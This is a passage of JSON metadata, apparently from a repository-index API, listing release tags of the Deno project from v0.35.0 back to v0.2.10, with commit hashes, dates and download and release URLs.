y_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"h